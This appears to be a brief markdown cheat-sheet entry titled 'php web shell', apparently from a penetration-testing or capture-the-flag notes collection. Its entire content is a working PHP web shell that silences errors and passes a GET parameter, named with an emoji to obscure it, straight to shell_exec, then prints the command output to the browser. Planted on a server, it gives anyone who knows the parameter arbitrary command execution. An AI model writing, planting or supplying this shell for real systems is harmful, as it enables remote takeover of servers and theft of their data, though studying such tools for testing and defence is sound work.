Common === ## php web shell ```php= <?php error_reporting(0); header("Content-Type:text/html; charset=big5"); $results = shell_exec($_GET['🍺']); // echo $results; echo str_replace("\n","<br>",str_replace("<","&lt;",str_replace(">","&gt;",$results))); ```